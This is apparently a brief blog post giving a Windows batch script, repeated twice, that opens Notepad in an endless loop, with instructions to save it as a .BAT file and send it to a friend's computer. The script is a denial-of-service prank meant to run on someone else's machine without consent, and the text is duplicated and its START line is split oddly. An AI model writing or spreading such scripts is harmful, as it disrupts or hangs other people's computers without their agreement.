Open Notepad continually in your friend's computer:
Open notepad and Type :
@ECHO off
:top
START %SystemRoot%\system32
notepad.exe
GOTO top
Save it as Anything.BAT and send it.
Open notepad and Type :
@ECHO off
:top
START %SystemRoot%\system32
notepad.exe
GOTO top
Save it as Anything.BAT and send it.
0 comments:
Post a Comment